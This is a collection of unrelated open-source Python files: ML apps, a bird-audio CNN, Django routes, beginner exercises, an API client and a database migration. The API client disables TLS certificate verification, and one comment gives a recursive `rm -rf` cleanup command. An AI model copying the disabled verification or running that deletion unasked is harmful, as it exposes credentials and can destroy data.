use_column_width=True) # caption = 'ML', \r\n\r\nst.write(\"import csv dataset, that does not have any string predictors or missing values\")\r\nst.write(\"csv file must have target variable in the rightmost column, and the remaining predictors to the left\")\r\n\r\n# COMPUTATION\r\nst.sidebar.header('User Input Dataset and Parameters')\r\n\r\n\r\nst.sidebar.markdown(\"\"\"\r\n[Example CSV input file](https://drive.google.com/file/d/16iVua1vtUVvRno8lmTH_ZQ7f964OXDiU/view?usp=sharing)\r\n\"\"\")\r\nuploaded_file = st.sidebar.file_uploader(\"Upload your input CSV file\", type=[\"csv\"])\r\n\r\nsplit_ratio = st.sidebar.slider('Train Test Split Ratio (Input Test Percentage)', 0, 100, 80, 10)\r\nsplit_ratio = split_ratio/100\r\nmodel = st.selectbox('ML Regressor Model', ('Linear Regression', 'Polynomial Regression', 
'SVM Support Vector Machine', 'Decision Tree', 'Random Forest', 'XG Boost'))\r\n\r\n\r\nif uploaded_file is not None:\r\n\r\n dataset = pd.read_csv(uploaded_file)\r\n X = dataset.iloc[:, :-1].values\r\n y = dataset.iloc[:, -1].values\r\n\r\n #Splitting the dataset into Training and Testing Set\r\n from sklearn.model_selection import train_test_split\r\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = split_ratio, random_state = 0)\r\n\r\n if model == 'Linear Regression':\r\n from sklearn.linear_model import LinearRegression\r\n regressor = LinearRegression()\r\n regressor.fit(X_train, y_train)\r\n elif model == 'Polynomial Regression':\r\n poly_degree = st.sidebar.slider('Polynomial Regressor Degree', 0, 5, 2)\r\n from sklearn.linear_model import LinearRegression\r\n regressor = LinearRegression()\r\n regressor.fit(X, y)\r\n from sklearn.preprocessing import PolynomialFeatures\r\n poly_reg = PolynomialFeatures(degree = poly_degree)\r\n X_poly = poly_reg.fit_transform(X)\r\n regressor = LinearRegression()\r\n regressor.fit(X_poly, y)\r\n elif model == 'SVM Support Vector Machine':\r\n from sklearn.svm import SVR\r\n regressor = SVR(kernel = 'rbf')\r\n regressor.fit(X, y)\r\n elif model == 'Decision Tree':\r\n from sklearn.tree import DecisionTreeRegressor\r\n regressor = DecisionTreeRegressor(random_state = 0)\r\n regressor.fit(X, y)\r\n elif model == 'Random Forest':\r\n from sklearn.ensemble import RandomForestRegressor\r\n regressor = RandomForestRegressor(n_estimators = 10, random_state = 0)\r\n regressor.fit(X, y)\r\n elif model == 'XG Boost':\r\n from xgboost import XGBRegressor\r\n regressor = XGBRegressor()\r\n regressor.fit(X_train, y_train)\r\n else:\r\n from sklearn.linear_model import LinearRegression\r\n regressor = LinearRegression()\r\n regressor.fit(X_train, y_train)\r\n\r\n st.subheader('Trained Model Results')\r\n #from sklearn.metrics import accuracy_score\r\n #y_pred = regressor.predict(X_test)\r\n #accuracy = accuracy_score(y_test, y_pred)\r\n #st.write('Accuracy:')\r\n #st.success(str(accuracy))\r\n\r\n st.subheader('Downladable Model')\r\n st.write('Dowload regressor model, and use the following code to create your own ML products')\r\n pickle.dump(regressor, open('regressor.pkl', 'wb'))\r\n \r\n if st.button('Get Link to Download Trained Model as pkl'):\r\n tmp_download_link = download_link('regressor.pkl', 'regressor.pkl', 'Click here to download your Trained Model!')\r\n st.markdown(tmp_download_link, unsafe_allow_html=True)\r\n \r\n st.subheader('Code')\r\n if st.button('Get Link to Python (.py) file to make ML predictions with your model!'):\r\n tmp_download_link = download_link('/content/gdrive/MyDrive/Machine Learning/Universal Regressor/Predictor-Universal_Regressor.ipynb', 'app.py', 'Click here to download your Python Code!')\r\n st.markdown(tmp_download_link, unsafe_allow_html=True)\r\n\r\n st.subheader('Requirements')\r\n if st.button('Get Link to requirements.txt file and Procfile to deploy your ML Model as a website'):\r\n tmp_download_link = download_link('/content/gdrive/MyDrive/Machine Learning/Universal Regressor/requirements.txt', 'requirements.txt', 'Click here to download your requirements.txt!')\r\n st.markdown(tmp_download_link, unsafe_allow_html=True)\r\n tmp_download_link = download_link('/content/gdrive/MyDrive/Machine Learning/Universal Regressor/Procfile', 'Procfile', 'Click here to download the Procfile!')\r\n st.markdown(tmp_download_link, unsafe_allow_html=True)\r\n\r\n st.success('Create a file named \"input.csv\" 
and place it in the same folder as the regressor model and the Code to make Predictions')\r\n","repo_name":"Varun-Chandrashekhar/Universal-ML-Regressor","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5636,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"74567955929","text":"'''\nSimple CNN on mel spectrograms with global avg/max pooling.\nTrains on full audio length.\n'''\nimport numpy as np\nimport torch as t\nimport pytorch_lightning as pl\nfrom itertools import chain\nfrom sklearn.metrics import roc_auc_score, average_precision_score\nfrom src.data.dataset import EBIRD_CODE_TO_INDEX\n\n\nclass SimpleCNN(pl.LightningModule):\n '''\n Input: batch_size x n_mels x segment_size\n Output: batch_size x n_classes\n '''\n def __init__(self, n_classes, n_mels, segment_size, lr=0.001):\n super().__init__()\n self.conv_1 = t.nn.Conv2d(1, 64, (5, 5), padding=(2, 2))\n self.bn_1 = t.nn.BatchNorm2d(64)\n self.maxpool_1 = t.nn.MaxPool2d((4, 3))\n\n self.conv_2 = t.nn.Conv2d(64, 128, (5, 5), padding=(2, 2))\n self.bn_2 = t.nn.BatchNorm2d(128)\n self.maxpool_2 = t.nn.MaxPool2d((4, 3))\n\n self.conv_3 = t.nn.Conv2d(128, 256, (3, 3), padding=(1, 1))\n self.bn_3 = t.nn.BatchNorm2d(256)\n self.maxpool_3 = t.nn.MaxPool2d((4, 3))\n\n self.conv_4 = t.nn.Conv2d(256, 512, (3, 3), padding=(1, 1))\n self.maxpool_4 = t.nn.MaxPool2d((2, 3))\n self.bn_4 = t.nn.BatchNorm2d(512)\n\n # self.conv_a = t.nn.Conv1d(1, 8, 5, padding=1)\n # self.conv_b = t.nn.Conv1d(1, 8, 5)\n self.linear_y = t.nn.Linear(128, 128)\n\n self.dropout = t.nn.Dropout(0.5)\n # self.linear = t.nn.Linear(2816 + 128 * 2, n_classes)\n self.linear = t.nn.Linear(3328, n_classes)\n # self.linear_1 = t.nn.Linear(2816 + 128 * 2, 1024)\n # self.linear_2 = t.nn.Linear(1024, n_classes)\n\n self.n_mels = n_mels\n self.segment_size = segment_size\n self.n_classes = n_classes\n self.lr = lr\n # self.loss_fn = t.nn.BCEWithLogitsLoss()\n # self.loss_fn = t.nn.CrossEntropyLoss()\n self.save_hyperparameters()\n\n def forward(self, batch):\n batch_size = len(batch['mel_specs'])\n n_segments = int(max(batch['segment_lengths']))\n mel_specs = batch['mel_specs']\n\n mel_specs = (\n mel_specs\n .transpose(-2, -1)\n .reshape(n_segments * batch_size, 1, -1, self.n_mels)\n .transpose(-2, -1)\n )\n\n # Mel features\n x = self.conv_1(mel_specs)\n x = self.bn_1(x)\n x = self.maxpool_1(x)\n x = t.relu(x)\n\n x = self.conv_2(x)\n x = self.bn_2(x)\n x = self.maxpool_2(x)\n x = t.relu(x)\n\n x = self.conv_3(x)\n x = self.bn_3(x)\n x = self.maxpool_3(x)\n x = t.relu(x)\n\n x = self.conv_4(x)\n x = self.bn_4(x)\n x = self.maxpool_4(x)\n\n x = x.view(batch_size, n_segments, -1)\n x = self.dropout(x)\n\n # Frequency features\n y = t.sum(mel_specs.view(batch_size, n_segments, self.n_mels, -1), dim=-1)\n # print('y.shape beginning: ', y.shape)\n y_max, _ = t.max(y, dim=-1)\n y_min, _ = t.min(y, dim=-1)\n y_max = y_max.unsqueeze(-1)\n y_min = y_min.unsqueeze(-1)\n\n # print('y_max.shape: ', y_max.shape)\n # print('y_min.shape: ', y_min.shape)\n\n y = (y - y_min) / (y_max - y_min + 0.0001)\n y = self.linear_y(y)\n\n # print('y.shape after linear: ', y.shape)\n\n # Global avg/max pooling\n segment_lengths = batch['segment_lengths'].view(-1, 1)\n\n for i in range(x.size(0)):\n x[i, int(segment_lengths[i].item()):, :] = 0\n y[i, int(segment_lengths[i].item()):, :] = 0\n\n x1 = t.sum(x, dim=1)\n x1 = x1 / segment_lengths\n x2, _ = t.max(x, dim=1)\n\n y1 = t.sum(y, dim=1)\n y1 = y1 / segment_lengths\n y2, 
_ = t.max(y, dim=1)\n\n # print('y1.shape: ', y1.shape)\n # print('y2.shape: ', y2.shape)\n\n z = t.cat((x1, x2, y1, y2), dim=-1)\n\n z = self.linear(z)\n\n # z = self.linear_1(z)\n # z = t.relu(z)\n # z = self.dropout(z)\n # z = self.linear_2(z)\n\n return z\n\n def training_step(self, batch, batch_idx):\n prediction = self(batch)\n loss = t.nn.functional.binary_cross_entropy_with_logits(\n prediction,\n batch['encoded_ebird_codes']\n )\n # loss = t.nn.functional.cross_entropy(\n # prediction,\n # t.argmax(batch['encoded_ebird_codes'], dim=-1)\n # )\n tensorboard_logs = {'train/loss': loss.item()}\n return {'loss': loss, 'log': tensorboard_logs}\n\n def validation_step(self, batch, batch_idx):\n prediction = self(batch)\n loss = t.nn.functional.binary_cross_entropy_with_logits(\n prediction,\n batch['encoded_ebird_codes']\n )\n # loss = t.nn.functional.cross_entropy(\n # prediction,\n # t.argmax(batch['encoded_ebird_codes'], dim=-1)\n # )\n predicted_ranking = t.argsort(prediction, dim=1, descending=True)\n expected_indices = [EBIRD_CODE_TO_INDEX[x] for x in batch['primary_ebird_codes']]\n\n top_1 = []\n top_3 = []\n top_5 = []\n\n for expected_index, ranking in zip(expected_indices, predicted_ranking):\n if expected_index in ranking[:1]:\n top_1.append(1)\n else:\n top_1.append(0)\n\n if expected_index in ranking[:3]:\n top_3.append(1)\n else:\n top_3.append(0)\n\n if expected_index in ranking[:5]:\n top_5.append(1)\n else:\n top_5.append(0)\n return {\n 'val_loss': loss,\n 'top_1': top_1,\n 'top_3': top_3,\n 'top_5': top_5,\n 'predictions': prediction.cpu().numpy(),\n 'expectations': batch['encoded_ebird_codes'].cpu().numpy(),\n }\n\n def validation_epoch_end(self, outputs):\n val_loss_mean = t.stack([x['val_loss'] for x in outputs]).mean()\n top_1 = t.mean(t.FloatTensor(list(chain(*[x['top_1'] for x in outputs]))))\n top_3 = t.mean(t.FloatTensor(list(chain(*[x['top_3'] for x in outputs]))))\n top_5 = t.mean(t.FloatTensor(list(chain(*[x['top_5'] for x in outputs]))))\n\n predictions = np.concatenate([x['predictions'] for x in outputs])\n expectations = np.concatenate([x['expectations'] for x in outputs])\n\n try:\n roc_auc_macro = roc_auc_score(expectations, predictions, average='macro')\n except ValueError:\n roc_auc_macro = 0\n\n try:\n roc_auc_micro = roc_auc_score(expectations, predictions, average='micro')\n except ValueError:\n roc_auc_micro = 0\n\n try:\n roc_auc_samples = roc_auc_score(expectations, predictions, average='samples')\n except ValueError:\n roc_auc_samples = 0\n\n try:\n avg_pr_macro = average_precision_score(expectations, predictions, average='macro')\n except ValueError:\n avg_pr_macro = 0\n\n try:\n avg_pr_micro = average_precision_score(expectations, predictions, average='micro')\n except ValueError:\n avg_pr_micro = 0\n\n try:\n avg_pr_samples = average_precision_score(expectations, predictions, average='samples')\n except ValueError:\n avg_pr_samples = 0\n\n tensorboard_logs = {\n 'val/loss': val_loss_mean,\n 'val/top_1': top_1,\n 'val/top_3': top_3,\n 'val/top_5': top_5,\n 'val/roc_auc_macro': roc_auc_macro,\n 'val/roc_auc_micro': roc_auc_micro,\n 'val/roc_auc_samples': roc_auc_samples,\n 'val/avg_pr_macro': avg_pr_macro,\n 'val/avg_pr_micro': avg_pr_micro,\n 'val/avg_pr_samples': avg_pr_samples,\n }\n\n return {\n 'val_loss': val_loss_mean,\n 'top_1': top_1,\n 'top_3': top_3,\n 'top_5': top_5,\n 'val/roc_auc_macro': roc_auc_macro,\n 'val/roc_auc_micro': roc_auc_micro,\n 'val/roc_auc_samples': roc_auc_samples,\n 'val/avg_pr_macro': avg_pr_macro,\n 
'val/avg_pr_micro': avg_pr_micro,\n 'val/avg_pr_samples': avg_pr_samples,\n 'log': tensorboard_logs,\n }\n\n def configure_optimizers(self):\n optimizer = t.optim.Adam(self.parameters(), lr=self.lr)\n # scheduler = t.optim.lr_scheduler.CyclicLR(\n # optimizer,\n # self.lr / 4,\n # self.lr * 2,\n # step_size_up=500,\n # cycle_momentum=False\n # )\n scheduler = t.optim.lr_scheduler.ReduceLROnPlateau(\n optimizer,\n mode='min',\n factor=0.1,\n patience=4,\n threshold=0.0001,\n min_lr=1e-8,\n )\n return [optimizer], [{\n 'scheduler': scheduler,\n 'interval': 'epoch',\n }]\n\n\nclass Collate:\n def __init__(self, n_frames, min_log, max_log):\n self.min_log = min_log\n self.max_log = max_log\n self.n_frames = n_frames\n\n def __call__(self, batch):\n batch_size = len(batch)\n\n lengths = [x['mel_spec'].size(1) for x in batch]\n max_length = max(lengths)\n\n k = (max_length // self.n_frames) + 1\n padded_length = k * self.n_frames\n\n n_mels = batch[0]['mel_spec'].size(0)\n\n batched_mels = t.zeros(batch_size, n_mels, padded_length)\n\n segment_lengths = t.FloatTensor([(length // self.n_frames) + 1 for length in lengths])\n\n with t.no_grad():\n for i, item in enumerate(batch):\n mel_spec = t.log(item['mel_spec'] + 0.0001)\n mel_spec = (mel_spec - self.min_log) / (self.min_log - self.max_log)\n batched_mels[i, :, :mel_spec.size(1)] = mel_spec\n\n primary_labels = [x['primary_label'] for x in batch]\n secondary_labels = [x['secondary_labels'] for x in batch]\n durations = [x['duration'] for x in batch]\n\n encoded_ebird_codes = t.cat([x['encoded_ebird_codes'].view(1, -1) for x in batch], dim=0)\n primary_ebird_codes = [x['primary_ebird_code'] for x in batch]\n secondary_ebird_codes = list(chain(*[x['secondary_ebird_codes'] for x in batch]))\n\n return {\n 'mel_specs': batched_mels,\n 'original_lengths': lengths,\n 'encoded_ebird_codes': encoded_ebird_codes,\n 'primary_ebird_codes': primary_ebird_codes,\n 'secondary_ebird_codes': secondary_ebird_codes,\n 'primary_labels': primary_labels,\n 'secondary_labels': secondary_labels,\n 'segment_lengths': segment_lengths,\n 'durations': durations,\n }\n","repo_name":"Informhunter/birdcal-identification","sub_path":"src/models/simple_cnn/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73124067607","text":"from django.urls import path, include\nfrom . 
import views\n\n\nurlpatterns = [\n\tpath('', views.tipoDeUsuario, name='tipoDeUsuario'),\n path('verSeleccionados/', views.verSeleccionados, name='verSeleccionados'),\n path('admins/', views.admins, name='admins'),\n path('users/', views.users, name='users'),\n path('masInfo//', views.masInfo, name='masInfo'),\n]\n\n\n","repo_name":"zoesacks/muni","sub_path":"proyecto/principal/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20407153135","text":"__author__ = 'MrHowe'\n# -*- coding: utf-8 -*-\n\n'''\n进阶练习,函数相关2\n\n2016-9-4 晚\n'''\n'''\n1.lambda总结\n\n\n'''\nd = lambda x:x+1\n\n'''\n#练习1:定义一个方法get_num(num),num参数是列表类型,判断列表里面的元素为数字类型。其他类型则报错,并返回一个偶数列表。(注:列表里面的元素偶数)\n\n\n\n'''\n\ndef get_num(num):\n\t'''\n\t返回一个偶数列表\n\t:param num:\n\t:return:lst\n\t'''\n\tlst = []\n\tfor i in num :\n\t\tif isinstance(i,int) or isinstance(i,float):\n\t\t\tif i == 0:\n\t\t\t\tcontinue\n\t\t\tm = i % 2\n\t\t\tif m==0:\n\t\t\t\tlst.append(i)\n\t\telse:\n\t\t\treturn\n\treturn lst\n\n","repo_name":"mrhowe2118/MrHowe","sub_path":"ex_2.py","file_name":"ex_2.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36436021172","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nimport get_reports\r\nimport datetime\r\n\r\ndef get_diff_dates(x,y):\r\n diff = x-y\r\n return diff.days\r\n\r\n\r\n\r\ndates =[]\r\npercentages = []\r\n\r\ndef plot_bar():\r\n # this is for plotting purpose\r\n load_dates_per()\r\n index = np.arange(len(dates))\r\n plt.bar(index, percentages)\r\n plt.xlabel('Dates', fontsize=7)\r\n plt.ylabel('Attendance Percentage', fontsize=7)\r\n plt.xticks(index, dates, fontsize=10, rotation=30)\r\n plt.title('Attendance Percentage Statistics')\r\n plt.ion()\r\n plt.show()\r\n dates.clear()\r\n percentages.clear()\r\n\r\n\r\ndef load_dates_per():\r\n global dates \r\n global percentages \r\n\r\n for date in get_reports.get_all_att_reports_list():\r\n dates.append(date[:-4])\r\n percentages.append( get_reports.get_desday_att_percentage(date[:-4]))\r\n \r\n\r\ndef checkdates(x,y):\r\n if xend_dt):\r\n print(\"Entered\")\r\n temp = start_dt\r\n start_dt = end_dt\r\n end_dt = temp\r\n #swap dates too\r\n t = start\r\n start = end\r\n end = t\r\n\r\n print(\"Out\")\r\n # print(\"sad\")\r\n global dates\r\n global percentages\r\n print(start,end)\r\n print(start0 :\r\n start_index =0\r\n end_index = 0 \r\n print(\"Entered\")\r\n #find starting date index\r\n for index,date in enumerate(get_reports.get_all_att_reports_list()):\r\n if date[:-4] == start:\r\n start_index =index\r\n break\r\n #find Ending date index\r\n for index,date in enumerate(get_reports.get_all_att_reports_list()):\r\n if date[:-4] == end:\r\n end_index =index\r\n break\r\n temp_list = get_reports.get_all_att_reports_list()\r\n temp_list = temp_list[start_index:end_index+1] \r\n for date in temp_list:\r\n dates.append(date[:-4])\r\n for date in dates:\r\n percentages.append(get_reports.get_desday_att_percentage(date))\r\n plot_range(dates,percentages)\r\n dates.clear()\r\n percentages.clear()\r\n print(\"done \")\r\n return 1\r\n else:\r\n return -1\r\n else:\r\n return -1\r\n\r\ndef get_as_date(st):\r\n return datetime.date(int(st[:4]), int(st[5:7]), int(st[8:]))\r\n\r\n\r\ndef checklen(start,end):\r\n if len(start)==10 and len(end)==10:\r\n return True\r\n else:\r\n return False\r\n\r\ndef 
plot_range(dates,percentages):\r\n index = np.arange(len(dates))\r\n plt.bar(index, percentages)\r\n plt.xlabel('Dates', fontsize=7)\r\n plt.ylabel('Attendance Percentage', fontsize=7)\r\n plt.xticks(index, dates, fontsize=10, rotation=30)\r\n plt.title('Custom dates range attendance percentage bargraph')\r\n plt.ion() \r\n plt.show()\r\n\r\n# get_range_plot('2019-03-06','2019-03-07')\r\n\r\n# checkdates('2019-03-06','2019-03-07')\r\n\r\n\r\n\r\n\r\n ","repo_name":"idileepd/Face-Recognition-Based-Attendance-System","sub_path":"Software/plot_graphs.py","file_name":"plot_graphs.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"24841518439","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 9 13:35:20 2021\n\n@author: michaelpokornik\n\"\"\"\n\"\"\"\nCreated on Mon Mar 8 10:38:18 2021\n\n@author: michaelpokornik\n\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport ElectronDataClass as EDC\n\n\n\ntarget = 'uniform' #uniform or channel\ncut = '30deg' # or normal\n#ED = EDC.ElectronDataClass({'Path':'/Volumes/4TBWD/PhotonProject/track_carbon/uniform/30deg/'})\nED = EDC.ElectronDataClass({'Path':'/Volumes/4TBWD/PhotonProject/track_carbon/' + f'{target}' + '/' + f'{cut}' + '/'})\n\n#%%\nt = ED.LoadElectronsAtTime('id',40,{'XLim':(-5,5,1e6),'YLim':(-4,4,1e6)})\nrad_angle = np.arctan2(ED.py[ED.eleInd > 0],ED.px[ED.eleInd > 0])\ndeg_angle = np.rad2deg(rad_angle)\nphi_bins = np.linspace(-180, 180,181)\ndigitized = np.digitize(deg_angle,phi_bins)\nnormCounts = ED.w[ED.eleInd > 0] / np.mean(np.diff(phi_bins))\nphiMidPoints = (phi_bins[1:] + phi_bins[:-1]) / 2\nLineOut = np.bincount(digitized-1, weights=normCounts)\nLineOutMissing = np.zeros((phiMidPoints.shape[0] - LineOut.shape[0]))\nLineOut = np.append(LineOut,LineOutMissing)\nfig = plt.figure()\nax = fig.gca()\nax.plot(phiMidPoints,LineOut)\n#plt.rcParams.update({'font.size': 14})\nax.set_title(r'uniform ' + f'{cut}' + f' {t * 1e15:.2f} fs',fontsize=22)\nax.set_xlabel(r'$\\Phi [\\circ]$',fontsize=16)\nax.set_ylabel(r'$\\frac{dN}{d\\Phi}$',fontsize=16)\nax.set_xticks(np.linspace(-180,180,4))\nax.set_ylim([0, 1e13])\nax.grid()\n","repo_name":"mmpoko/PIC_EpochDataAnalysis","sub_path":"ElectronSingleTimeCaller.py","file_name":"ElectronSingleTimeCaller.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21903091644","text":"#Display epoch time from time given\n#Mrunali Patel, prn-023\n\nfrom datetime import datetime\nseconds = input(\"Enter number of seconds=\") # taking millisec from user on which any file created\nresult = datetime.fromtimestamp(seconds) # calculating time \nprint(result)\n\n\n\n\n","repo_name":"mrunali10/CodeClub","sub_path":"calculate_Epoch_.py","file_name":"calculate_Epoch_.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16480420173","text":"archivo = open('quijote.txt')\ncontenido = archivo.read()\narchivo.close()\n\nletras = set()\n\nfor letra in contenido:\n letras.add(letra)\n\nsimbolos = ''\nfor letra in letras:\n if letra not in 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz':\n simbolos += letra\n\nprint('símbolos en el quijote:', 
simbolos)\n","repo_name":"madepozo/PythonGroup_04","sub_path":"clase1/quijote.py","file_name":"quijote.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70926110169","text":"\"\"\"rsa URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom crypto.views import *\nfrom django.contrib.auth import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('',index, name='home'),\n path('success',success, name='success'),\n path('signup/',signup,name='signup'),\n path('gen/',key,name='gen'),\n path('message/',meso,name='meso'),\n path('decrypt/',dec,name='dec'),\n path('about/',about,name='about'),\n path('accounts/login/', views.LoginView.as_view(), name='login'),\n path('accounts/logout/', views.LogoutView.as_view(), name='logout'),\n\n]\n\nadmin.site.site_header = 'Kamau And Sons Crypto'\nadmin.site.site_title = 'Kamau And Sons Crypto'\nadmin.site.index_title = 'Kamau And Sons'","repo_name":"chegejohn159/crypto","sub_path":"cryptosons/rsa/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18356227201","text":"#7.\tFaça um Programa que leia três números e mostre o maior e o menor deles.\nnum1 = int(input(\"digite um numero\\n\"))\nnum2 = int(input(\"digite outro numero\\n\"))\nnum3 = int(input(\"digite outro numero\\n\"))\n\nmaior = num1\nmenor = num1\n\nif maior < num2:\n maior = num2\n\nif maior < num3:\n maior = num3\n\nif menor > num2:\n menor = num2\n\nif menor > num3:\n menor = num3\n\nprint('Maior: ', maior)\nprint('Menor: ', menor)\n","repo_name":"dropihs/logicPython","sub_path":"2) Estrutura de Decisão/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"69948294169","text":"from logging.config import dictConfig, logging\nfrom urlparse import urljoin\n\nimport requests\n\nfrom settings import LOGGING_CONFIG, ERROR_CODES_TO_MEANING_MAPPING\nfrom utils.errors import UnexpectedHTTPStatusCodeReturnedError, HTTPErrorCodeReceivedError\n\ndictConfig(LOGGING_CONFIG)\nlogger = logging.getLogger()\n\n\nclass Connection(object):\n\n def __init__(self, b2c2_base_url, api_token):\n self.b2c2_base_url = b2c2_base_url\n self.api_token = api_token\n\n def _get_headers(self):\n return {\n 'Content-Type': 'application/json',\n 'Authorization': 'Token {api_token}'.format(api_token=self.api_token),\n }\n\n def _check_response_for_known_error_codes(self, response, known_error_codes):\n status_code = response.status_code\n if known_error_codes is not None and status_code in known_error_codes:\n message = ERROR_CODES_TO_MEANING_MAPPING[status_code]\n logger.info('Detected error status code {status_code}: 
{message}'.format(status_code=status_code,\n message=message))\n raise HTTPErrorCodeReceivedError(message)\n\n def _check_response_for_expected_status_codes(self, response, expected_status_codes):\n status_code = response.status_code\n if expected_status_codes is not None and status_code not in expected_status_codes:\n logger.info('Detected unexpected status code {status_code}'.format(status_code=status_code))\n raise UnexpectedHTTPStatusCodeReturnedError('Received status code {status_code} is not contained in the list of '\n 'expected status codes {expected_status_codes}'.format(expected_status_codes=expected_status_codes,\n status_code=status_code))\n\n def _validate_response(self, response, expected_status_codes, known_error_codes):\n self._check_response_for_known_error_codes(response=response,\n known_error_codes=known_error_codes)\n self._check_response_for_expected_status_codes(response=response,\n expected_status_codes=expected_status_codes)\n\n def get_from_url(self, relative_url, data, expected_status_codes=None, known_error_codes=None):\n url = urljoin(self.b2c2_base_url,\n relative_url)\n logger.info(\"GETting {data} from '{url}'...\".format(data=data,\n url=url))\n response = requests.get(url=url,\n headers=self._get_headers(),\n params=data,\n verify=False)\n self._validate_response(response=response,\n expected_status_codes=expected_status_codes,\n known_error_codes=known_error_codes)\n logger.info(\"...done GETting {data} from '{url}'!\".format(data=data,\n url=url))\n return response\n\n def post_to_url(self, relative_url, data, expected_status_codes=None, known_error_codes=None):\n url = urljoin(self.b2c2_base_url,\n relative_url)\n logger.info(\"POSTing {data} to '{url}'...\".format(data=data,\n url=url))\n response = requests.post(url=url,\n headers=self._get_headers(),\n json=data,\n verify=False)\n self._validate_response(response=response,\n expected_status_codes=expected_status_codes,\n known_error_codes=known_error_codes)\n logger.info(\"...done POSTing {data} to '{url}'!\".format(data=data,\n url=url))\n return response\n","repo_name":"dumrauf/b2c2_client","sub_path":"utils/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":4127,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"13439878291","text":"\"\"\"migrate molecule table\n\nRevision ID: fd76a1459fa3\nRevises: 2a334994fcb3\nCreate Date: 2021-10-12 10:31:53.993770\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = \"fd76a1459fa3\"\ndown_revision = \"2a334994fcb3\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.alter_column(\n \"molecule\", \"molecule_hash\", existing_type=sa.VARCHAR(), type_=sa.CHAR(length=40), existing_nullable=True\n )\n op.alter_column(\n \"molecule\",\n \"identifiers\",\n existing_type=postgresql.JSON(astext_type=sa.Text()),\n type_=postgresql.JSONB(astext_type=sa.Text()),\n existing_nullable=True,\n )\n\n op.alter_column(\"molecule\", \"fix_com\", existing_type=sa.BOOLEAN(), nullable=False)\n op.alter_column(\"molecule\", \"fix_orientation\", existing_type=sa.BOOLEAN(), nullable=False)\n\n op.create_index(\"ix_molecule_identifiers\", \"molecule\", [\"identifiers\"], unique=False, postgresql_using=\"gin\")\n op.drop_column(\"molecule\", \"molecular_formula\")\n # ### end Alembic commands ###\n\n\ndef downgrade():\n raise RuntimeError(\"Cannot downgrade\")\n","repo_name":"MolSSI/QCFractal","sub_path":"qcfractal/qcfractal/alembic/versions/2021-10-12-fd76a1459fa3_migrate_molecule_table.py","file_name":"2021-10-12-fd76a1459fa3_migrate_molecule_table.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":134,"dataset":"github-code","pt":"31"} +{"seq_id":"13130799982","text":"import os\nimport os.path as pth\nimport glob\n\n\nif __name__ == '__main__':\n for npz_path in glob.glob(\"data/**/*.npz\", recursive=True):\n npz_file = pth.basename(npz_path)\n data_dir, set_name = pth.split(pth.dirname(npz_path))\n new_path = pth.join(data_dir, \"%s_%s\" % (set_name, npz_file))\n\n print(\"%s -> %s\" % (npz_path, new_path))\n os.rename(npz_path, new_path)\n\n # Afterwards clean up extracted files with\n # find . -type d -maxdepth 2 -mindepth 2 -exec rm -rf {} \\;\n","repo_name":"anofox/aws_summit","sub_path":"02_rename_move_npz_files.py","file_name":"02_rename_move_npz_files.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19837540092","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom swagger_server.models.base_model_ import Model\nfrom swagger_server.models.ethernet_top_ethernet import EthernetTopEthernet # noqa: F401,E501\nfrom swagger_server import util\n\n\nclass EthernetTop(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n def 